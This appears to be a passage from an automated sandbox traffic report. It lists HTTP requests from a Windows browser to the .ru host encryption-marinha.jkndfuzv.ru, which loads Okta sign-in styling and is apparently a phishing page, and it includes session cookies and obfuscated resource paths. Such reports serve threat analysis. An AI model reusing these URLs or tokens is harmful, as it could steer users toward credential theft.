    Source: global trafficHTTP traffic detected: GET /GDSherpa-regular.woff2 HTTP/1.1Host: encryption-marinha.jkndfuzv.ruConnection: keep-aliveOrigin: https://encryption-marinha.jkndfuzv.rusec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://encryption-marinha.jkndfuzv.ru/tqrmmkqnkybhgrcpajlvlmkvressy5l3xb609h7xeqsb767nl?YTUSIOUTJWFKEHXUXRYQVBSNXAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkZyZmxmV1dGTDVYS0xEUnVGYmpibmc9PSIsInZhbHVlIjoialhaNzhMdlBEYW91OHBKb2NoWXJlZ2ZXbXY2RW1DN3IxMDJhUHZIalk4dG8wVVpVc3BOL1AwMGZCdkFwV00rNUVCWmJvTzdJRXd2dVZvMzZtSjlQUnJUcUxlNHpVZUdRaDM4d3picnd1VldPYnNiY0wxYzY5ZDdrVExzZFBoSDMiLCJtYWMiOiI3ZjdmZWUyYzQ1Y2JiMzQ2N2I0YzQ0N2NlNzE0NmJjZTYyN2U0ZWM0NzQzNTFjZjYxMWNkMzc0MzNmMjMwMWM0IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkJkNDE5K3ZRZFFNd01uMmFseXc5b3c9PSIsInZhbHVlIjoiQllDbm5YV0JrdE5ZU1c5eitnTTg2dEd4Y3JEc1lXakhkQWF0TFVCS01EczlpTzZoOVJHRlBmN3c5bUxOYXZMd09kUjZEZXpBZFYxNGpOZDRaSWU3eHA3WTRjUm1zZlAvaEtGdjZHcmFDdFk3S01lV01VMVVCZ3JZRS9CVitMMFYiLCJtYWMiOiJkOGMxZDY5MzczN2Q0OWI2NTgyYjMyNTE1MmMzMmM3ZTk1ZWUyNjBlYTA0OWU2NTUxYTMyNDNkZWMwYjJjNTFiIiwidGFnIjoiIn0%3D
    Source: global trafficHTTP traffic detected: GET /GDSherpa-regular.woff HTTP/1.1Host: encryption-marinha.jkndfuzv.ruConnection: keep-aliveOrigin: https://encryption-marinha.jkndfuzv.rusec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://encryption-marinha.jkndfuzv.ru/tqrmmkqnkybhgrcpajlvlmkvressy5l3xb609h7xeqsb767nl?YTUSIOUTJWFKEHXUXRYQVBSNXAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkZyZmxmV1dGTDVYS0xEUnVGYmpibmc9PSIsInZhbHVlIjoialhaNzhMdlBEYW91OHBKb2NoWXJlZ2ZXbXY2RW1DN3IxMDJhUHZIalk4dG8wVVpVc3BOL1AwMGZCdkFwV00rNUVCWmJvTzdJRXd2dVZvMzZtSjlQUnJUcUxlNHpVZUdRaDM4d3picnd1VldPYnNiY0wxYzY5ZDdrVExzZFBoSDMiLCJtYWMiOiI3ZjdmZWUyYzQ1Y2JiMzQ2N2I0YzQ0N2NlNzE0NmJjZTYyN2U0ZWM0NzQzNTFjZjYxMWNkMzc0MzNmMjMwMWM0IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkJkNDE5K3ZRZFFNd01uMmFseXc5b3c9PSIsInZhbHVlIjoiQllDbm5YV0JrdE5ZU1c5eitnTTg2dEd4Y3JEc1lXakhkQWF0TFVCS01EczlpTzZoOVJHRlBmN3c5bUxOYXZMd09kUjZEZXpBZFYxNGpOZDRaSWU3eHA3WTRjUm1zZlAvaEtGdjZHcmFDdFk3S01lV01VMVVCZ3JZRS9CVitMMFYiLCJtYWMiOiJkOGMxZDY5MzczN2Q0OWI2NTgyYjMyNTE1MmMzMmM3ZTk1ZWUyNjBlYTA0OWU2NTUxYTMyNDNkZWMwYjJjNTFiIiwidGFnIjoiIn0%3D
    Source: global trafficHTTP traffic detected: GET /fent/randexp.js/releases/download/v0.4.3/randexp.min.js HTTP/1.1Host: github.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://encryption-marinha.jkndfuzv.ru/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /assets/js/sdk/okta-signin-widget/7.18.0/css/okta-sign-in.min.css HTTP/1.1Host: ok4static.oktacdn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleSec-Fetch-Storage-Access: activeReferer: https://encryption-marinha.jkndfuzv.ru/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /assets/loginpage/css/loginpage-theme.e0d37a504604ef874bad26435d62011f.css HTTP/1.1Host: ok4static.oktacdn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleSec-Fetch-Storage-Access: activeReferer: https://encryption-marinha.jkndfuzv.ru/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /github-production-release-asset-2e65be/2925284/11f3acf8-4ccb-11e6-8ce4-c179c0a212de?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250314%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250314T113054Z&X-Amz-Expires=300&X-Amz-Signature=b36e5b21c5c25f14200202b073a138fc84a0aa21abce476eb7b59bbedfb609ce&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Drandexp.min.js&response-content-type=application%2Foctet-stream HTTP/1.1Host: objects.githubusercontent.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://encryption-marinha.jkndfuzv.ru/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /GDSherpa-vf.woff2 HTTP/1.1Host: encryption-marinha.jkndfuzv.ruConnection: keep-aliveOrigin: https://encryption-marinha.jkndfuzv.rusec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://encryption-marinha.jkndfuzv.ru/tqrmmkqnkybhgrcpajlvlmkvressy5l3xb609h7xeqsb767nl?YTUSIOUTJWFKEHXUXRYQVBSNXAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkZyZmxmV1dGTDVYS0xEUnVGYmpibmc9PSIsInZhbHVlIjoialhaNzhMdlBEYW91OHBKb2NoWXJlZ2ZXbXY2RW1DN3IxMDJhUHZIalk4dG8wVVpVc3BOL1AwMGZCdkFwV00rNUVCWmJvTzdJRXd2dVZvMzZtSjlQUnJUcUxlNHpVZUdRaDM4d3picnd1VldPYnNiY0wxYzY5ZDdrVExzZFBoSDMiLCJtYWMiOiI3ZjdmZWUyYzQ1Y2JiMzQ2N2I0YzQ0N2NlNzE0NmJjZTYyN2U0ZWM0NzQzNTFjZjYxMWNkMzc0MzNmMjMwMWM0IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkJkNDE5K3ZRZFFNd01uMmFseXc5b3c9PSIsInZhbHVlIjoiQllDbm5YV0JrdE5ZU1c5eitnTTg2dEd4Y3JEc1lXakhkQWF0TFVCS01EczlpTzZoOVJHRlBmN3c5bUxOYXZMd09kUjZEZXpBZFYxNGpOZDRaSWU3eHA3WTRjUm1zZlAvaEtGdjZHcmFDdFk3S01lV01VMVVCZ3JZRS9CVitMMFYiLCJtYWMiOiJkOGMxZDY5MzczN2Q0OWI2NTgyYjMyNTE1MmMzMmM3ZTk1ZWUyNjBlYTA0OWU2NTUxYTMyNDNkZWMwYjJjNTFiIiwidGFnIjoiIn0%3D
    Source: global trafficHTTP traffic detected: GET /GDSherpa-vf2.woff2 HTTP/1.1Host: encryption-marinha.jkndfuzv.ruConnection: keep-aliveOrigin: https://encryption-marinha.jkndfuzv.rusec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://encryption-marinha.jkndfuzv.ru/tqrmmkqnkybhgrcpajlvlmkvressy5l3xb609h7xeqsb767nl?YTUSIOUTJWFKEHXUXRYQVBSNXAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkZyZmxmV1dGTDVYS0xEUnVGYmpibmc9PSIsInZhbHVlIjoialhaNzhMdlBEYW91OHBKb2NoWXJlZ2ZXbXY2RW1DN3IxMDJhUHZIalk4dG8wVVpVc3BOL1AwMGZCdkFwV00rNUVCWmJvTzdJRXd2dVZvMzZtSjlQUnJUcUxlNHpVZUdRaDM4d3picnd1VldPYnNiY0wxYzY5ZDdrVExzZFBoSDMiLCJtYWMiOiI3ZjdmZWUyYzQ1Y2JiMzQ2N2I0YzQ0N2NlNzE0NmJjZTYyN2U0ZWM0NzQzNTFjZjYxMWNkMzc0MzNmMjMwMWM0IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkJkNDE5K3ZRZFFNd01uMmFseXc5b3c9PSIsInZhbHVlIjoiQllDbm5YV0JrdE5ZU1c5eitnTTg2dEd4Y3JEc1lXakhkQWF0TFVCS01EczlpTzZoOVJHRlBmN3c5bUxOYXZMd09kUjZEZXpBZFYxNGpOZDRaSWU3eHA3WTRjUm1zZlAvaEtGdjZHcmFDdFk3S01lV01VMVVCZ3JZRS9CVitMMFYiLCJtYWMiOiJkOGMxZDY5MzczN2Q0OWI2NTgyYjMyNTE1MmMzMmM3ZTk1ZWUyNjBlYTA0OWU2NTUxYTMyNDNkZWMwYjJjNTFiIiwidGFnIjoiIn0%3D
    Source: global trafficHTTP traffic detected: GET /34xdLZylu9sNLs7eTij0Uqz9prscZpLQu67104 HTTP/1.1Host: encryption-marinha.jkndfuzv.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://encryption-marinha.jkndfuzv.ru/tqrmmkqnkybhgrcpajlvlmkvressy5l3xb609h7xeqsb767nl?YTUSIOUTJWFKEHXUXRYQVBSNXAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkZyZmxmV1dGTDVYS0xEUnVGYmpibmc9PSIsInZhbHVlIjoialhaNzhMdlBEYW91OHBKb2NoWXJlZ2ZXbXY2RW1DN3IxMDJhUHZIalk4dG8wVVpVc3BOL1AwMGZCdkFwV00rNUVCWmJvTzdJRXd2dVZvMzZtSjlQUnJUcUxlNHpVZUdRaDM4d3picnd1VldPYnNiY0wxYzY5ZDdrVExzZFBoSDMiLCJtYWMiOiI3ZjdmZWUyYzQ1Y2JiMzQ2N2I0YzQ0N2NlNzE0NmJjZTYyN2U0ZWM0NzQzNTFjZjYxMWNkMzc0MzNmMjMwMWM0IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkJkNDE5K3ZRZFFNd01uMmFseXc5b3c9PSIsInZhbHVlIjoiQllDbm5YV0JrdE5ZU1c5eitnTTg2dEd4Y3JEc1lXakhkQWF0TFVCS01EczlpTzZoOVJHRlBmN3c5bUxOYXZMd09kUjZEZXpBZFYxNGpOZDRaSWU3eHA3WTRjUm1zZlAvaEtGdjZHcmFDdFk3S01lV01VMVVCZ3JZRS9CVitMMFYiLCJtYWMiOiJkOGMxZDY5MzczN2Q0OWI2NTgyYjMyNTE1MmMzMmM3ZTk1ZWUyNjBlYTA0OWU2NTUxYTMyNDNkZWMwYjJjNTFiIiwidGFnIjoiIn0%3D
    Source: global trafficHTTP traffic detected: GET /kl9Cb6f7Uuv8fQEwD093oOMERlzX9OD3Ac3VPlY56wuFWGKQ35uHV6xBNjuv220 HTTP/1.1Host: encryption-marinha.jkndfuzv.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://encryption-marinha.jkndfuzv.ru/tqrmmkqnkybhgrcpajlvlmkvressy5l3xb609h7xeqsb767nl?YTUSIOUTJWFKEHXUXRYQVBSNXAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkZyZmxmV1dGTDVYS0xEUnVGYmpibmc9PSIsInZhbHVlIjoialhaNzhMdlBEYW91OHBKb2NoWXJlZ2ZXbXY2RW1DN3IxMDJhUHZIalk4dG8wVVpVc3BOL1AwMGZCdkFwV00rNUVCWmJvTzdJRXd2dVZvMzZtSjlQUnJUcUxlNHpVZUdRaDM4d3picnd1VldPYnNiY0wxYzY5ZDdrVExzZFBoSDMiLCJtYWMiOiI3ZjdmZWUyYzQ1Y2JiMzQ2N2I0YzQ0N2NlNzE0NmJjZTYyN2U0ZWM0NzQzNTFjZjYxMWNkMzc0MzNmMjMwMWM0IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkJkNDE5K3ZRZFFNd01uMmFseXc5b3c9PSIsInZhbHVlIjoiQllDbm5YV0JrdE5ZU1c5eitnTTg2dEd4Y3JEc1lXakhkQWF0TFVCS01EczlpTzZoOVJHRlBmN3c5bUxOYXZMd09kUjZEZXpBZFYxNGpOZDRaSWU3eHA3WTRjUm1zZlAvaEtGdjZHcmFDdFk3S01lV01VMVVCZ3JZRS9CVitMMFYiLCJtYWMiOiJkOGMxZDY5MzczN2Q0OWI2NTgyYjMyNTE1MmMzMmM3ZTk1ZWUyNjBlYTA0OWU2NTUxYTMyNDNkZWMwYjJjNTFiIiwidGFnIjoiIn0%3D
    Source: global trafficHTTP traffic detected: GET /ijKWEY7gRXQm1JNCLSnYvcXyv9pGf253dTVw89gLm7vwI92mhs7QBmbAm2yz230 HTTP/1.1Host: encryption-marinha.jkndfuzv.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://encryption-marinha.jkndfuzv.ru/tqrmmkqnkybhgrcpajlvlmkvressy5l3xb609h7xeqsb767nl?YTUSIOUTJWFKEHXUXRYQVBSNXAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkZyZmxmV1dGTDVYS0xEUnVGYmpibmc9PSIsInZhbHVlIjoialhaNzhMdlBEYW91OHBKb2NoWXJlZ2ZXbXY2RW1DN3IxMDJhUHZIalk4dG8wVVpVc3BOL1AwMGZCdkFwV00rNUVCWmJvTzdJRXd2dVZvMzZtSjlQUnJUcUxlNHpVZUdRaDM4d3picnd1VldPYnNiY0wxYzY5ZDdrVExzZFBoSDMiLCJtYWMiOiI3ZjdmZWUyYzQ1Y2JiMzQ2N2I0YzQ0N2NlNzE0NmJjZTYyN2U0ZWM0NzQzNTFjZjYxMWNkMzc0MzNmMjMwMWM0IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkJkNDE5K3ZRZFFNd01uMmFseXc5b3c9PSIsInZhbHVlIjoiQllDbm5YV0JrdE5ZU1c5eitnTTg2dEd4Y3JEc1lXakhkQWF0TFVCS01EczlpTzZoOVJHRlBmN3c5bUxOYXZMd09kUjZEZXpBZFYxNGpOZDRaSWU3eHA3WTRjUm1zZlAvaEtGdjZHcmFDdFk3S01lV01VMVVCZ3JZRS9CVitMMFYiLCJtYWMiOiJkOGMxZDY5MzczN2Q0OWI2NTgyYjMyNTE1MmMzMmM3ZTk1ZWUyNjBlYTA0OWU2NTUxYTMyNDNkZWMwYjJjNTFiIiwidGFnIjoiIn0%3D
    Source: global trafficHTTP traffic detected: GET /uvzWbq53F9oUBbZ6Pvast8uNBxSwpjYvpcHgRi4X34130 HTTP/1.1Host: encryption-marinha.jkndfuzv.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://encryption-marinha.jkndfuzv.ru/tqrmmkqnkybhgrcpajlvlmkvressy5l3xb609h7xeqsb767nl?YTUSIOUTJWFKEHXUXRYQVBSNXAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkdseWYxdzJpWGVTMEJydy94MkFEYUE9PSIsInZhbHVlIjoiVDlBTUxyMTdQRGFWdzZhSXNvKzBKUjM5WVFPZ3hER3crN2pEcjFiVUZCL0VSaENmUkxGMEVJNDhQeVAvOVpIS2RRdjRPOVE3OXcraFNBbmluRFA4VWFlZGdZVmhRVW5lelFlQXEzSFQrTjdhSWhmTjhqREQ4OVZmTDNVNlBsRVoiLCJtYWMiOiJkODczY2M4ZGQ1YWE1NjcyNmMxZTFiYmUyYmZhZmY4YTg3ZGM5NjMxZDNlNzQwMTgwYTZmM2Q4ZDQ1MmU1OWUyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImhtQlplWC81bVVjcEVwSHdEN1hDOUE9PSIsInZhbHVlIjoiOFZGZEdmSDh1NDhuYWprQU8zdFJEd3NQU0FyZExXbTBHUnV1UllEUUVIMHFYOEh0MW1VN2ZEV2tjVnU3Q3JKbEpxRkcvMUpmbjFiZndYR1dXanBKMjFIa2lXNlFvUGF5OVRkV2loL1BLOHNHdStpNU9nS3EzdVNhbDVhRUttby8iLCJtYWMiOiIxMzRjZjM5MWYzMGNmMzBiNzJmOGE4MWNhNTJmYWQwN2Q4NDc3M2U0MDMyOTIyZGYyMzM0YmYzYTdhOWVjOTdiIiwidGFnIjoiIn0%3D
    Source: global trafficHTTP traffic detected: GET /oplZe0JQgDwLxmPPrn3AcmPOKBS4ghvickIYGe8gd45140 HTTP/1.1Host: encryption-marinha.jkndfuzv.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://encryption-marinha.jkndfuzv.ru/tqrmmkqnkybhgrcpajlvlmkvressy5l3xb609h7xeqsb767nl?YTUSIOUTJWFKEHXUXRYQVBSNXAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkdseWYxdzJpWGVTMEJydy94MkFEYUE9PSIsInZhbHVlIjoiVDlBTUxyMTdQRGFWdzZhSXNvKzBKUjM5WVFPZ3hER3crN2pEcjFiVUZCL0VSaENmUkxGMEVJNDhQeVAvOVpIS2RRdjRPOVE3OXcraFNBbmluRFA4VWFlZGdZVmhRVW5lelFlQXEzSFQrTjdhSWhmTjhqREQ4OVZmTDNVNlBsRVoiLCJtYWMiOiJkODczY2M4ZGQ1YWE1NjcyNmMxZTFiYmUyYmZhZmY4YTg3ZGM5NjMxZDNlNzQwMTgwYTZmM2Q4ZDQ1MmU1OWUyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImhtQlplWC81bVVjcEVwSHdEN1hDOUE9PSIsInZhbHVlIjoiOFZGZEdmSDh1NDhuYWprQU8zdFJEd3NQU0FyZExXbTBHUnV1UllEUUVIMHFYOEh0MW1VN2ZEV2tjVnU3Q3JKbEpxRkcvMUpmbjFiZndYR1dXanBKMjFIa2lXNlFvUGF5OVRkV2loL1BLOHNHdStpNU9nS3EzdVNhbDVhRUttby8iLCJtYWMiOiIxMzRjZjM5MWYzMGNmMzBiNzJmOGE4MWNhNTJmYWQwN2Q4NDc3M2U0MDMyOTIyZGYyMzM0YmYzYTdhOWVjOTdiIiwidGFnIjoiIn0%3D
    Source: global trafficHTTP traffic detected: GET /efAlkLzZXEwNsgINX7w1qxrgFMBnoYa5WVYJijrAmeuDXpDcVRZAjYpFJOZ90150 HTTP/1.1Host: encryption-marinha.jkndfuzv.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://encryption-marinha.jkndfuzv.ru/tqrmmkqnkybhgrcpajlvlmkvressy5l3xb609h7xeqsb767nl?YTUSIOUTJWFKEHXUXRYQVBSNXAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkdseWYxdzJpWGVTMEJydy94MkFEYUE9PSIsInZhbHVlIjoiVDlBTUxyMTdQRGFWdzZhSXNvKzBKUjM5WVFPZ3hER3crN2pEcjFiVUZCL0VSaENmUkxGMEVJNDhQeVAvOVpIS2RRdjRPOVE3OXcraFNBbmluRFA4VWFlZGdZVmhRVW5lelFlQXEzSFQrTjdhSWhmTjhqREQ4OVZmTDNVNlBsRVoiLCJtYWMiOiJkODczY2M4ZGQ1YWE1NjcyNmMxZTFiYmUyYmZhZmY4YTg3ZGM5NjMxZDNlNzQwMTgwYTZmM2Q4ZDQ1MmU1OWUyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImhtQlplWC81bVVjcEVwSHdEN1hDOUE9PSIsInZhbHVlIjoiOFZGZEdmSDh1NDhuYWprQU8zdFJEd3NQU0FyZExXbTBHUnV1UllEUUVIMHFYOEh0MW1VN2ZEV2tjVnU3Q3JKbEpxRkcvMUpmbjFiZndYR1dXanBKMjFIa2lXNlFvUGF5OVRkV2loL1BLOHNHdStpNU9nS3EzdVNhbDVhRUttby8iLCJtYWMiOiIxMzRjZjM5MWYzMGNmMzBiNzJmOGE4MWNhNTJmYWQwN2Q4NDc3M2U0MDMyOTIyZGYyMzM0YmYzYTdhOWVjOTdiIiwidGFnIjoiIn0%3D
    Source: global trafficHTTP traffic detected: GET /ijh3pCKtx2MXEuj3T1idod88SGEmvyzP0ZxllXfeCSfXEG7N78170 HTTP/1.1Host: encryption-marinha.jkndfuzv.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://encryption-marinha.jkndfuzv.ru/tqrmmkqnkybhgrcpajlvlmkvressy5l3xb609h7xeqsb767nl?YTUSIOUTJWFKEHXUXRYQVBSNXAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkdseWYxdzJpWGVTMEJydy94MkFEYUE9PSIsInZhbHVlIjoiVDlBTUxyMTdQRGFWdzZhSXNvKzBKUjM5WVFPZ3hER3crN2pEcjFiVUZCL0VSaENmUkxGMEVJNDhQeVAvOVpIS2RRdjRPOVE3OXcraFNBbmluRFA4VWFlZGdZVmhRVW5lelFlQXEzSFQrTjdhSWhmTjhqREQ4OVZmTDNVNlBsRVoiLCJtYWMiOiJkODczY2M4ZGQ1YWE1NjcyNmMxZTFiYmUyYmZhZmY4YTg3ZGM5NjMxZDNlNzQwMTgwYTZmM2Q4ZDQ1MmU1OWUyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImhtQlplWC81bVVjcEVwSHdEN1hDOUE9PSIsInZhbHVlIjoiOFZGZEdmSDh1NDhuYWprQU8zdFJEd3NQU0FyZExXbTBHUnV1UllEUUVIMHFYOEh0MW1VN2ZEV2tjVnU3Q3JKbEpxRkcvMUpmbjFiZndYR1dXanBKMjFIa2lXNlFvUGF5OVRkV2loL1BLOHNHdStpNU9nS3EzdVNhbDVhRUttby8iLCJtYWMiOiIxMzRjZjM5MWYzMGNmMzBiNzJmOGE4MWNhNTJmYWQwN2Q4NDc3M2U0MDMyOTIyZGYyMzM0YmYzYTdhOWVjOTdiIiwidGFnIjoiIn0%3D
    Source: global trafficHTTP traffic detected: GET /yzDhxxcm7mbe0biUXnf7h5BSC0wgalccVUxATWopC0JTt9qZL8buLnc90180 HTTP/1.1Host: encryption-marinha.jkndfuzv.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://encryption-marinha.jkndfuzv.ru/tqrmmkqnkybhgrcpajlvlmkvressy5l3xb609h7xeqsb767nl?YTUSIOUTJWFKEHXUXRYQVBSNXAccept-Encoding: 